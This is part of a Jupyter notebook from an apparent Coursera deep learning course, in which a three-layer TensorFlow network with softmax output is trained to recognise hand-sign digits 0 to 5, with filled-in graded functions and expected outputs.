to teach our computers to decipher sign language. We spent a few hours taking pictures in front of a white wall and came up with the following dataset. It's now your job to build an algorithm that would facilitate communications from a speech-impaired person to someone who doesn't understand sign language.\n\n- **Training set**: 1080 pictures (64 by 64 pixels) of signs representing numbers from 0 to 5 (180 pictures per number).\n- **Test set**: 120 pictures (64 by 64 pixels) of signs representing numbers from 0 to 5 (20 pictures per number).\n\nNote that this is a subset of the SIGNS dataset. The complete dataset contains many more signs.\n\nHere are examples for each number, and how an explanation of how we represent the labels. These are the original pictures, before we lowered the image resolutoion to 64 by 64 pixels.\n<img src=\"images/hands.png\" style=\"width:800px;height:350px;\"><caption><center> <u><font color='purple'> **Figure 1**</u><font color='purple'>: SIGNS dataset <br> <font color='black'> </center>\n\n\nRun the following code to load the dataset.", "_____no_output_____" ] ], [ [ "# Loading the dataset\nX_train_orig, Y_train_orig, X_test_orig, Y_test_orig, classes = load_dataset()", "_____no_output_____" ] ], [ [ "Change the index below and run the cell to visualize some examples in the dataset.", "_____no_output_____" ] ], [ [ "# Example of a picture\nindex = 0\nplt.imshow(X_train_orig[index])\nprint (\"y = \" + str(np.squeeze(Y_train_orig[:, index])))", "y = 5\n" ] ], [ [ "As usual you flatten the image dataset, then normalize it by dividing by 255. On top of that, you will convert each label to a one-hot vector as shown in Figure 1. Run the cell below to do so.", "_____no_output_____" ] ], [ [ "# Flatten the training and test images\nX_train_flatten = X_train_orig.reshape(X_train_orig.shape[0], -1).T\nX_test_flatten = X_test_orig.reshape(X_test_orig.shape[0], -1).T\n# Normalize image vectors\nX_train = X_train_flatten/255.\nX_test = X_test_flatten/255.\n# Convert training and test labels to one hot matrices\nY_train = convert_to_one_hot(Y_train_orig, 6)\nY_test = convert_to_one_hot(Y_test_orig, 6)\n\nprint (\"number of training examples = \" + str(X_train.shape[1]))\nprint (\"number of test examples = \" + str(X_test.shape[1]))\nprint (\"X_train shape: \" + str(X_train.shape))\nprint (\"Y_train shape: \" + str(Y_train.shape))\nprint (\"X_test shape: \" + str(X_test.shape))\nprint (\"Y_test shape: \" + str(Y_test.shape))", "number of training examples = 1080\nnumber of test examples = 120\nX_train shape: (12288, 1080)\nY_train shape: (6, 1080)\nX_test shape: (12288, 120)\nY_test shape: (6, 120)\n" ] ], [ [ "**Note** that 12288 comes from $64 \\times 64 \\times 3$. Each image is square, 64 by 64 pixels, and 3 is for the RGB colors. Please make sure all these shapes make sense to you before continuing.", "_____no_output_____" ], [ "**Your goal** is to build an algorithm capable of recognizing a sign with high accuracy. To do so, you are going to build a tensorflow model that is almost the same as one you have previously built in numpy for cat recognition (but now using a softmax output). It is a great occasion to compare your numpy implementation to the tensorflow one. \n\n**The model** is *LINEAR -> RELU -> LINEAR -> RELU -> LINEAR -> SOFTMAX*. The SIGMOID output layer has been converted to a SOFTMAX. A SOFTMAX layer generalizes SIGMOID to when there are more than two classes. ", "_____no_output_____" ], [ "### 2.1 - Create placeholders\n\nYour first task is to create placeholders for `X` and `Y`. This will allow you to later pass your training data in when you run your session. \n\n**Exercise:** Implement the function below to create the placeholders in tensorflow.", "_____no_output_____" ] ], [ [ "# GRADED FUNCTION: create_placeholders\n\ndef create_placeholders(n_x, n_y):\n \"\"\"\n Creates the placeholders for the tensorflow session.\n \n Arguments:\n n_x -- scalar, size of an image vector (num_px * num_px = 64 * 64 * 3 = 12288)\n n_y -- scalar, number of classes (from 0 to 5, so -> 6)\n \n Returns:\n X -- placeholder for the data input, of shape [n_x, None] and dtype \"tf.float32\"\n Y -- placeholder for the input labels, of shape [n_y, None] and dtype \"tf.float32\"\n \n Tips:\n - You will use None because it let's us be flexible on the number of examples you will for the placeholders.\n In fact, the number of examples during test/train is different.\n \"\"\"\n\n X = tf.placeholder(tf.float32, shape=[n_x, None], name='X')\n Y = tf.placeholder(tf.float32, shape=[n_y, None], name='Y')\n \n return X, Y", "_____no_output_____" ], [ "X, Y = create_placeholders(12288, 6)\nprint (\"X = \" + str(X))\nprint (\"Y = \" + str(Y))", "X = Tensor(\"X_1:0\", shape=(12288, ?), dtype=float32)\nY = Tensor(\"Y_1:0\", shape=(6, ?), dtype=float32)\n" ] ], [ [ "**Expected Output**: \n\n<table> \n <tr> \n <td>\n **X**\n </td>\n <td>\n Tensor(\"Placeholder_1:0\", shape=(12288, ?), dtype=float32) (not necessarily Placeholder_1)\n </td>\n </tr>\n <tr> \n <td>\n **Y**\n </td>\n <td>\n Tensor(\"Placeholder_2:0\", shape=(6, ?), dtype=float32) (not necessarily Placeholder_2)\n </td>\n </tr>\n\n</table>", "_____no_output_____" ], [ "### 2.2 - Initializing the parameters\n\nYour second task is to initialize the parameters in tensorflow.\n\n**Exercise:** Implement the function below to initialize the parameters in tensorflow. You are going use Xavier Initialization for weights and Zero Initialization for biases. The shapes are given below. As an example, to help you, for W1 and b1 you could use: \n\n```python\nW1 = tf.get_variable(\"W1\", [25,12288], initializer = tf.contrib.layers.xavier_initializer(seed = 1))\nb1 = tf.get_variable(\"b1\", [25,1], initializer = tf.zeros_initializer())\n```\nPlease use `seed = 1` to make sure your results match ours.", "_____no_output_____" ] ], [ [ "# GRADED FUNCTION: initialize_parameters\n\ndef initialize_parameters():\n \"\"\"\n Initializes parameters to build a neural network with tensorflow. The shapes are:\n W1 : [25, 12288]\n b1 : [25, 1]\n W2 : [12, 25]\n b2 : [12, 1]\n W3 : [6, 12]\n b3 : [6, 1]\n \n Returns:\n parameters -- a dictionary of tensors containing W1, b1, W2, b2, W3, b3\n \"\"\"\n \n tf.set_random_seed(1) # so that your \"random\" numbers match ours\n \n W1 = tf.get_variable(\"W1\", [25,12288], initializer = tf.contrib.layers.xavier_initializer(seed = 1))\n b1 = tf.get_variable(\"b1\", [25, 1], initializer = tf.zeros_initializer())\n W2 = tf.get_variable(\"W2\", [12,25], initializer = tf.contrib.layers.xavier_initializer(seed = 1))\n b2 = tf.get_variable(\"b2\", [12, 1], initializer = tf.zeros_initializer())\n W3 = tf.get_variable(\"W3\", [6, 12], initializer = tf.contrib.layers.xavier_initializer(seed = 1))\n b3 = tf.get_variable(\"b3\", [6, 1], initializer = tf.zeros_initializer())\n\n parameters = {\"W1\": W1,\n \"b1\": b1,\n \"W2\": W2,\n \"b2\": b2,\n \"W3\": W3,\n \"b3\": b3}\n \n return parameters", "_____no_output_____" ], [ "tf.reset_default_graph()\nwith tf.Session() as sess:\n parameters = initialize_parameters()\n print(\"W1 = \" + str(parameters[\"W1\"]))\n print(\"b1 = \" + str(parameters[\"b1\"]))\n print(\"W2 = \" + str(parameters[\"W2\"]))\n print(\"b2 = \" + str(parameters[\"b2\"]))", "W1 = <tf.Variable 'W1:0' shape=(25, 12288) dtype=float32_ref>\nb1 = <tf.Variable 'b1:0' shape=(25, 1) dtype=float32_ref>\nW2 = <tf.Variable 'W2:0' shape=(12, 25) dtype=float32_ref>\nb2 = <tf.Variable 'b2:0' shape=(12, 1) dtype=float32_ref>\n" ] ], [ [ "**Expected Output**: \n\n<table> \n <tr> \n <td>\n **W1**\n </td>\n <td>\n < tf.Variable 'W1:0' shape=(25, 12288) dtype=float32_ref >\n </td>\n </tr>\n <tr> \n <td>\n **b1**\n </td>\n <td>\n < tf.Variable 'b1:0' shape=(25, 1) dtype=float32_ref >\n </td>\n </tr>\n <tr> \n <td>\n **W2**\n </td>\n <td>\n < tf.Variable 'W2:0' shape=(12, 25) dtype=float32_ref >\n </td>\n </tr>\n <tr> \n <td>\n **b2**\n </td>\n <td>\n < tf.Variable 'b2:0' shape=(12, 1) dtype=float32_ref >\n </td>\n </tr>\n\n</table>", "_____no_output_____" ], [ "As expected, the parameters haven't been evaluated yet.", "_____no_output_____" ], [ "### 2.3 - Forward propagation in tensorflow \n\nYou will now implement the forward propagation module in tensorflow. The function will take in a dictionary of parameters and it will complete the forward pass. The functions you will be using are: \n\n- `tf.add(...,...)` to do an addition\n- `tf.matmul(...,...)` to do a matrix multiplication\n- `tf.nn.relu(...)` to apply the ReLU activation\n\n**Question:** Implement the forward pass of the neural network. We commented for you the numpy equivalents so that you can compare the tensorflow implementation to numpy. It is important to note that the forward propagation stops at `z3`. The reason is that in tensorflow the last linear layer output is given as input to the function computing the loss. Therefore, you don't need `a3`!\n\n", "_____no_output_____" ] ], [ [ "# GRADED FUNCTION: forward_propagation\n\ndef forward_propagation(X, parameters):\n \"\"\"\n Implements the forward propagation for the model: LINEAR -> RELU -> LINEAR -> RELU -> LINEAR -> SOFTMAX\n \n Arguments:\n X -- input dataset placeholder, of shape (input size, number of examples)\n parameters -- python dictionary containing your parameters \"W1\", \"b1\", \"W2\", \"b2\", \"W3\", \"b3\"\n the shapes are given in initialize_parameters\n\n Returns:\n Z3 -- the output of the last LINEAR unit\n \"\"\"\n \n # Retrieve the parameters from the dictionary \"parameters\" \n W1 = parameters['W1']\n b1 = parameters['b1']\n W2 = parameters['W2']\n b2 = parameters['b2']\n W3 = parameters['W3']\n b3 = parameters['b3']\n # Numpy Equivalents:\n Z1 = tf.add(tf.matmul(W1, X), b1) # Z1 = np.dot(W1, X) + b1\n A1 = tf.nn.relu(Z1) # A1 = relu(Z1)\n Z2 = tf.add(tf.matmul(W2, A1), b2) # Z2 = np.dot(W2, A1) + b2\n A2 = tf.nn.relu(Z2) # A2 = relu(Z2)\n Z3 = tf.add(tf.matmul(W3, A2), b3) # Z3 = np.dot(W3, A2) + b3\n \n return Z3", "_____no_output_____" ], [ "tf.reset_default_graph()\n\nwith tf.Session() as sess:\n X, Y = create_placeholders(12288, 6)\n parameters = initialize_parameters()\n Z3 = forward_propagation(X, parameters)\n print(\"Z3 = \" + str(Z3))", "Z3 = Tensor(\"Add_2:0\", shape=(6, ?), dtype=float32)\n" ] ], [ [ "**Expected Output**: \n\n<table> \n <tr> \n <td>\n **Z3**\n </td>\n <td>\n Tensor(\"Add_2:0\", shape=(6, ?), dtype=float32)\n </td>\n </tr>\n\n</table>", "_____no_output_____" ], [ "You may have noticed that the forward propagation doesn't output any cache. You will understand why below, when we get to brackpropagation.", "_____no_output_____" ], [ "### 2.4 Compute cost\n\nAs seen before, it is very easy to compute the cost using:\n```python\ntf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits = ..., labels = ...))\n```\n**Question**: Implement the cost function below. \n- It is important to know that the \"`logits`\" and \"`labels`\" inputs of `tf.nn.softmax_cross_entropy_with_logits` are expected to be of shape (number of examples, num_classes). We have thus transposed Z3 and Y for you.\n- Besides, `tf.reduce_mean` basically does the summation over the examples.", "_____no_output_____" ] ], [ [ "# GRADED FUNCTION: compute_cost \n\ndef compute_cost(Z3, Y):\n \"\"\"\n Computes the cost\n \n Arguments:\n Z3 -- output of forward propagation (output of the last LINEAR unit), of shape (6, number of examples)\n Y -- \"true\" labels vector placeholder, same shape as Z3\n \n Returns:\n cost - Tensor of the cost function\n \"\"\"\n \n # to fit the tensorflow requirement for tf.nn.softmax_cross_entropy_with_logits(...,...)\n logits = tf.transpose(Z3)\n labels = tf.transpose(Y)\n\n cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=labels))\n \n return cost", "_____no_output_____" ], [ "tf.reset_default_graph()\n\nwith tf.Session() as sess:\n X, Y = create_placeholders(12288, 6)\n parameters = initialize_parameters()\n Z3 = forward_propagation(X, parameters)\n cost = compute_cost(Z3, Y)\n print(\"cost = \" + str(cost))", "cost = Tensor(\"Mean:0\", shape=(), dtype=float32)\n" ] ], [ [ "**Expected Output**: \n\n<table> \n <tr> \n <td>\n **cost**\n </td>\n <td>\n Tensor(\"Mean:0\", shape=(), dtype=float32)\n </td>\n </tr>\n\n</table>", "_____no_output_____" ], [ "### 2.5 - Backward propagation & parameter updates\n\nThis is where you become grateful to programming frameworks. All the backpropagation and the parameters update is taken care of in 1 line of code. It is very easy to incorporate this line in the model.\n\nAfter you compute the cost function. You will create an \"`optimizer`\" object. You have to call this object along with the cost when running the tf.session. When called, it will perform an optimization on the given cost with the chosen method and learning rate.\n\nFor instance, for gradient descent the optimizer would be:\n```python\noptimizer = tf.train.GradientDescentOptimizer(learning_rate = learning_rate).minimize(cost)\n```\n\nTo make the optimization you would do:\n```python\n_ , c = sess.run([optimizer, cost], feed_dict={X: minibatch_X, Y: minibatch_Y})\n```\n\nThis computes the backpropagation by passing through the tensorflow graph in the reverse order. From cost to inputs.\n\n**Note** When coding, we often use `_` as a \"throwaway\" variable to store values that we won't need to use later. Here, `_` takes on the evaluated value of `optimizer`, which we don't need (and `c` takes the value of the `cost` variable). ", "_____no_output_____" ], [ "### 2.6 - Building the model\n\nNow, you will bring it all together! \n\n**Exercise:** Implement the model. You will be calling the functions you had previously implemented.", "_____no_output_____" ] ], [ [ "def model(X_train, Y_train, X_test, Y_test, learning_rate = 0.0001,\n num_epochs = 1500, minibatch_size = 32, print_cost = True):\n \"\"\"\n Implements a three-layer tensorflow neural network: LINEAR->RELU->LINEAR->RELU->LINEAR->SOFTMAX.\n \n Arguments:\n X_train -- training set, of shape (input size = 12288, number of training examples = 1080)\n Y_train -- test set, of shape (output size = 6, number of training examples = 1080)\n X_test -- training set, of shape (input size = 12288, number of training examples = 120)\n Y_test -- test set, of shape (output size = 6, number of test examples = 120)\n learning_rate -- learning rate of the optimization\n num_epochs -- number of epochs of the optimization loop\n minibatch_size -- size of a minibatch\n print_cost -- True to print the cost every 100 epochs\n \n Returns:\n parameters -- parameters learnt by the model. They can then be used to predict.\n \"\"\"\n \n ops.reset_default_graph() # to be able to rerun the model without overwriting tf variables\n tf.set_random_seed(1) # to keep consistent results\n seed = 3 # to keep consistent results\n (n_x, m) = X_train.shape # (n_x: input size, m : number of examples in the train set)\n n_y = Y_train.shape[0] # n_y : output size\n costs = [] # To keep track of the cost\n \n # Create Placeholders of shape (n_x, n_y)\n X, Y = create_placeholders(n_x, n_y)\n\n # Initialize parameters\n parameters = initialize_parameters()\n \n # Forward propagation: Build the forward propagation in the tensorflow graph\n Z3 = forward_propagation(X, parameters)\n \n # Cost function: Add cost function to tensorflow graph\n cost = compute_cost(Z3, Y)\n \n # Backpropagation: Define the tensorflow optimizer. Use an AdamOptimizer.\n optimizer = tf.train.AdamOptimizer(learning_rate = learning_rate).minimize(cost)\n \n # Initialize all the variables\n init = tf.global_variables_initializer()\n\n # Start the session to compute the tensorflow graph\n with tf.Session() as sess:\n \n # Run the initialization\n sess.run(init)\n \n # Do the training loop\n for epoch in range(num_epochs):\n\n epoch_cost = 0. # Defines a cost related to an epoch\n num_minibatches = int(m / minibatch_size) # number of minibatches of size minibatch_size in the train set\n seed = seed + 1\n minibatches = random_mini_batches(X_train, Y_train, minibatch_size, seed)\n\n for minibatch in minibatches:\n\n # Select a minibatch\n (minibatch_X, minibatch_Y) = minibatch\n \n # IMPORTANT: The line that runs the graph on a minibatch.\n # Run the session to execute the \"optimizer\" and the \"cost\", the feedict should contain a minibatch for (X,Y).\n _ , minibatch_cost = sess.run([optimizer, cost], feed_dict={X: minibatch_X, Y: minibatch_Y})\n \n epoch_cost += minibatch_cost / minibatch_size\n\n # Print the cost every epoch\n if print_cost == True and epoch % 100 == 0:\n print (\"Cost after epoch %i: %f\" % (epoch, epoch_cost))\n if print_cost == True and epoch % 5 == 0:\n costs.append(epoch_cost)\n \n # plot the cost\n plt.plot(np.squeeze(costs))\n plt.ylabel('cost')\n plt.xlabel('iterations (per fives)')\n plt.title(\"Learning rate =\" + str(learning_rate))\n plt.show()\n\n # lets save the parameters in a variable\n parameters = sess.run(parameters)\n print (\"Parameters have been trained!\")\n\n # Calculate the correct predictions\n correct_prediction = tf.equal(tf.argmax(Z3), tf.argmax(Y))\n\n # Calculate accuracy on the test set\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, \"float\"))\n\n print (\"Train Accuracy:\", accuracy.eval({X: X_train, Y: Y_train}))\n print (\"Test Accuracy:\", accuracy.eval({X: X_test, Y: Y_test}))\n \n return parameters", "_____no_output_____" ] ], [ [ "Run the following cell to train your model! On our machine it takes about 5 minutes. Your \"Cost after epoch 100\" should be 1.048222. If it's not, don't waste time; interrupt the training by clicking on the square (⬛) in the upper bar of the notebook, and try to correct your code. If it is the correct cost, take a break and come back in 5 minutes!", "_____no_output_____" ] ], [ [ "parameters = model(X_train, Y_train, X_test, Y_test)", "Cost after epoch 0: 1.913693\nCost after epoch 100: 1.048222\nCost after epoch 200: 0.756012\nCost after epoch 300: 0.590844\nCost after epoch 400: 0.483423\nCost after epoch 500: 0.392928\nCost after epoch 600: 0.323629\nCost after epoch 700: 0.262100\nCost after epoch 800: 0.210199\nCost after epoch 900: 0.171622\nCost after epoch 1000: 0.145907\nCost after epoch 1100: 0.110942\nCost after epoch 1200: 0.088966\nCost after epoch 1300: 0.061226\nCost after epoch 1400: 0.053860\n" ] ], [ [ "**Expected Output**:\n\n<table> \n <tr> \n <td>\n **Train Accuracy**\n </td>\n <td>\n 0.999074\n </td>\n </tr>\n <tr> \n <td>\n **Test Accuracy**\n </td>\n <td>\n 0.716667\n </td>\n </tr>\n\n</table>\n\nAmazing, your algorithm can recognize a sign representing a figure between 0 and 5 with 71.7% accuracy.\n\n**Insights**:\n- Your model seems big enough to fit the training set well. However, given the difference between train and test accuracy, you could try to add L2 or dropout regularization to reduce overfitting. \n- Think about the session as a block of code to train the model. Each time you run the session on a minibatch, it trains the parameters. In total you have run the session a large number of times (1500 epochs) until you obtained well trained parameters.", "_____no_output_____" ], [ "### 2.7 - Test with your own image (optional / ungraded exercise)\n\nCongratulations on finishing this assignment. You can now take a picture of your hand and see the output of your model. To do that:\n 1. Click on \"File\" in the upper bar of this notebook, then click \"Open\" to go on your Coursera Hub.\n 2. Add your image to this Jupyter Notebook's directory, in the \"images\" folder\n 3. Write your image's name in the following code\n 4. Run the code and check if the algorithm is right!", "_____no_output_____" ] ], [ [ "import scipy\nfrom PIL import Image\nfrom scipy import ndimage\n\n## START CODE HERE ## (PUT YOUR IMAGE NAME) \nmy_image = \"thumbs_up.jpg\"\n## END CODE HERE ##\n\n# We preprocess your image to fit your algorithm.\nfname = \"images/\" + my_image\nimage = np.array(ndimage.imread(fname, flatten=False))\nimage = image/255.\nmy_image = scipy.misc.imresize(image, size=(64,64)).reshape((1, 64*64*3)).T\nmy_image_prediction = predict(my_image, parameters)\n\nplt.imshow(image)\nprint(\"Your algorithm predicts: y = \" + str(np.squeeze(my_image_prediction)))", "_____no_output_____" ] ], [ [ "You indeed deserved a \"thumbs-up\" although as you can see the algorithm seems to classify it incorrectly. The reason is that the training set doesn't contain any \"thumbs-up\", so the model doesn't know how to deal with it! We call that a \"mismatched data distribution\" and it is one of the various of the next course on \"Structuring Machine Learning Projects\".", "_____no_output_____" ], [ "<font color='blue'>\n**What you should remember**:\n- Tensorflow is a programming framework used in deep learning\n- The two main object classes in tensorflow are Tensors and Operators. \n- When you code in tensorflow you have to take the following steps:\n - Create a graph containing Tensors (Variables, Placeholders ...) and Operations (tf.matmul, tf.add, ...)\n - Create a session\n - Initialize the session\n - Run the session to execute the graph\n- You can execute the graph multiple times as you've seen in model()\n- The backpropagation and optimization is automatically done when running the session on the \"optimizer\" object.", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown" ]
[ [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown", "markdown" ], [ "code", "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown" ] ]
e72d91a9014f76a2309303a24ad494b7e3cfc025
3,903
ipynb
Jupyter Notebook
Jupyter Notebooks/JWST and WebbPSF/8_Comparing calibrated analytical with E2E images.ipynb
ivalaginja/PASTIS
ed52a4c838c93cd933f7a8c0bf52113cddd5a415
[ "BSD-3-Clause" ]
null
null
null
Jupyter Notebooks/JWST and WebbPSF/8_Comparing calibrated analytical with E2E images.ipynb
ivalaginja/PASTIS
ed52a4c838c93cd933f7a8c0bf52113cddd5a415
[ "BSD-3-Clause" ]
null
null
null
Jupyter Notebooks/JWST and WebbPSF/8_Comparing calibrated analytical with E2E images.ipynb
ivalaginja/PASTIS
ed52a4c838c93cd933f7a8c0bf52113cddd5a415
[ "BSD-3-Clause" ]
null
null
null
30.023077
336
0.591084
[ [ [ "# Comparing calibrated analytical with E2E images\n\nIn the process of generating the analytical matrix with `matrix_building_analytical.py` the code produces *calibrated* pair-wise aberrated analytical images. The script `matrix_building_analytical.py` does the same thing but produces pair-wise aberrated E2E images. In this notebook, I am comparing the resulting images from both.", "_____no_output_____" ] ], [ [ "import os\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom matplotlib.colors import LogNorm\nfrom astropy.io import fits\n%matplotlib inline\n\nos.chdir('../../pastis/')\nfrom config import CONFIG_INI\nimport util_pastis as util", "_____no_output_____" ], [ "# Reading parameters from configfile\nwhich_tel = CONFIG_INI.get('telescope', 'name')\nnb_seg = CONFIG_INI.getint(which_tel, 'nb_subapertures')\n\nnumdir = os.path.join(CONFIG_INI.get('local', 'local_data_path'), 'active', 'matrix_numerical')\nanadir = os.path.join(CONFIG_INI.get('local', 'local_data_path'), 'active', 'matrix_analytical')\n\nnumdir = '/Users/ilaginja/Documents/data_from_repos/pastis_data/2019-4-18_001_100nm/matrix_numerical'\nanadir = '/Users/ilaginja/Documents/data_from_repos/pastis_data/2019-4-18_001_100nm/matrix_analytical'\n\nprint(\"Reading E2E images from\", numdir)\nprint(\"Reading calibrated analytical images from\", anadir)", "_____no_output_____" ], [ "# Read the PSF cubes for both\nnum_cube = fits.getdata(os.path.join(numdir, \"darkholes\", \"dh_cube.fits\"))\nana_cube = fits.getdata(os.path.join(anadir, \"darkholes\", \"dh_cube.fits\"))\n\nprint(\"num_cube.shape:\", num_cube.shape)\nprint(\"ana_cube.shape:\", ana_cube.shape)", "_____no_output_____" ], [ "# Pick what segment aberration combo you want to look at\nseg1 = 3\nseg2 = 10\n\nif (seg1 not in range(1, nb_seg+1)) or (seg2 not in range(1, nb_seg+1)): # this could be simplified...\n print(\"Your setup only has {} segments\".format(nb_seg))\nelse:\n segind = (seg1-1) * nb_seg + (seg2-1)\n print('Segment pair: {} - {}'.format(seg1, seg2))\n print(\"segind:\", segind)", "_____no_output_____" ], [ "plt.figure(figsize=(18, 9))\nplt.suptitle('Segment pair: {} - {}'.format(seg1, seg2))\nplt.subplot(1, 2, 1)\nplt.imshow(util.zoom_cen(num_cube[segind], ana_cube.shape[2]/2), norm=LogNorm())\nplt.colorbar()\nplt.title('E2E DH')\nplt.subplot(1, 2, 2)\nplt.imshow(ana_cube[segind], norm=LogNorm())\nplt.colorbar()\nplt.title('Analytical DH')", "_____no_output_____" ] ] ]
[ "markdown", "code" ]
[ [ "markdown" ], [ "code", "code", "code", "code", "code" ] ]
e72d9291ad88ab860996d97dc29761e8aeeb4ed7
240,664
ipynb
Jupyter Notebook
2b-pdf-plumber.ipynb
drkane/pdf-accounts
14c8ca294e11519567fb78f0c899c4504a023ec5
[ "MIT" ]
1
2020-06-23T22:42:11.000Z
2020-06-23T22:42:11.000Z
2b-pdf-plumber.ipynb
drkane/pdf-accounts
14c8ca294e11519567fb78f0c899c4504a023ec5
[ "MIT" ]
null
null
null
2b-pdf-plumber.ipynb
drkane/pdf-accounts
14c8ca294e11519567fb78f0c899c4504a023ec5
[ "MIT" ]
null
null
null
93.899337
134,636
0.742413
[ [ [ "# Task 2b: Extracting data from OCR'd PDFs", "_____no_output_____" ], [ "Import the needed libraries. We'll be using the amazing [pdfplumber](https://github.com/jsvine/pdfplumber) to gather lines from the account PDF.", "_____no_output_____" ] ], [ [ "import pdfplumber\nimport pandas as pd\nfrom matplotlib.patches import Rectangle\nimport matplotlib.pyplot as plt\nfrom decimal import Decimal\nimport re\n\n%matplotlib inline", "_____no_output_____" ] ], [ [ "Function for printing a diagram with the boundaries of the words on a page.", "_____no_output_____" ] ], [ [ "def print_words(p):\n fig = plt.figure(figsize=(4,6))\n ax = fig.add_axes([0,0,1,1]) \n _ = ax.set_xlim(left=0, right=int(p.width))\n _ = ax.set_ylim(top=0, bottom=int(p.height))\n for i in p.extract_words():\n r = Rectangle(\n # (left, bottom), width, height,\n (i['x0'], i['bottom']), (i['x1'] - i['x0']), (i['top'] - i['bottom']),\n color='blue'\n )\n r = ax.add_patch(r)", "_____no_output_____" ] ], [ [ "## Get a sample PDF\n\nThis is a PDF that has been OCR'ed using the process in task 2a. The `p` variable represents the page with the Balance Sheet on.", "_____no_output_____" ] ], [ [ "pdf = pdfplumber.open(\"test_accounts.pdf\")\np = pdf.pages[19]", "_____no_output_____" ] ], [ [ "Here's a representation of what the page looks like.", "_____no_output_____" ] ], [ [ "print_words(p)", "_____no_output_____" ] ], [ [ "## Approach 1: Use inbuilt `extract_table` function\n\nThis approach does find a table, but it's not great for getting at the data within.", "_____no_output_____" ] ], [ [ "pd.DataFrame(p.extract_table({\n \"horizontal_strategy\": \"text\",\n \"vertical_strategy\": \"text\",\n \"snap_tolerance\": 6,\n \"join_tolerance\": 2,\n}))", "_____no_output_____" ] ], [ [ "## Approach 2: Detecting lines\n\nThis function should output a series of recetangles giving separated lines in a PDF page. It's based on finding gaps between lines, so relies on there being vertical white space.", "_____no_output_____" ] ], [ [ "def detect_lines(p, x_tolerance=0):\n \"\"\"\n Detect lines in a PDF page\n \"\"\"\n cells = pd.DataFrame(p.extract_words(x_tolerance=x_tolerance)).sort_values([\"top\", \"x0\"])\n row_ranges = []\n this_range = []\n for i in range(0, int(p.height)):\n result = ((cells['bottom'] >= i) & (cells['top'] <= i)).sum()>0\n if result:\n this_range.append(i)\n else:\n if this_range:\n row_ranges.append(this_range)\n this_range = []\n # create bounding boxes: (x0, top, x1, bottom)\n return [{\n \"x0\": 0,\n \"top\": min(r),\n \"x1\": p.width,\n \"bottom\": max(r)\n } for r in row_ranges]", "_____no_output_____" ] ], [ [ "Draw a picture of the page with the lines highlighted.", "_____no_output_____" ] ], [ [ "im = p.to_image()\nim.draw_rects(detect_lines(p, 0))", "_____no_output_____" ] ], [ [ "## Approach 3: Use the `extract_text` function to get lines\n\nOnce the lines have been found, use a regex to find the data.", "_____no_output_____" ] ], [ [ "p.extract_text(y_tolerance=30).split('\\n')", "_____no_output_____" ], [ "def get_finances(pdf):\n \n finance_regex = r'(.*)\\s+(\\(?\\-?[\\,0-9]+\\)?)\\s+(\\(?\\-?[\\,0-9]+\\)?)$'\n \n def process_match(match):\n match = {\n \"text\": match[0],\n \"value1\": match[1],\n \"value2\": match[2]\n }\n for i in (\"value1\", \"value2\"):\n match[i] = match[i].replace(\",\", \"\")\n if match[i][0] == \"(\" and match[i][-1] == \")\":\n match[i] = match[i].replace(\"(\", \"-\").replace(\")\", \"\")\n match[i] = float(match[i])\n return match\n \n finances = []\n for ps in pdf.pages:\n for l in ps.extract_text(y_tolerance=20).split('\\n'):\n match = re.search(finance_regex, l)\n if match:\n m = process_match(match.groups())\n m['page'] = ps.page_number\n finances.append(m)\n \n return pd.DataFrame(finances)", "_____no_output_____" ], [ "get_finances(pdf)", "_____no_output_____" ] ], [ [ "## Test on a random sample of accounts", "_____no_output_____" ] ], [ [ "# get a random sample of accounts to look at\nimport os\nimport random", "_____no_output_____" ], [ "accounts = {\"charity\": [], \"company_ixbrl\": [], \"company_pdf\": []}\nfor a in os.listdir(\"accounts\"):\n if a.startswith(\"GB-CHC\"):\n accounts[\"charity\"].append(a)\n elif a.startswith(\"GB-COH\"):\n if a.endswith(\".html\"):\n accounts[\"company_ixbrl\"].append(a)\n elif a.endswith(\".pdf\"):\n accounts[\"company_pdf\"].append(a)\naccounts", "_____no_output_____" ], [ "charity_sample =random.sample(accounts[\"charity\"], 10)", "_____no_output_____" ], [ "assets_regex = r'(total net assets|net (total )?assets)'", "_____no_output_____" ], [ "for c in charity_sample:\n c\n cpdf = pdfplumber.open(os.path.join(\"accounts\", c))\n try:\n df = get_finances(cpdf)\n except:\n continue\n if not isinstance(df, pd.DataFrame) or 'text' not in df.columns:\n continue\n assets = df[df[\"text\"].str.contains(assets_regex, case=False)]\n if assets.size > 0:\n assets", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ] ]
e72d9575d5db8a8ae5365ae127fd176874ee34d8
1,447
ipynb
Jupyter Notebook
dictionary/iterate_over_dictionary_solution.ipynb
eric999j/Udemy_Python_Hand_On
7a985b3e2c9adfd3648d240af56ac00bb916c3ad
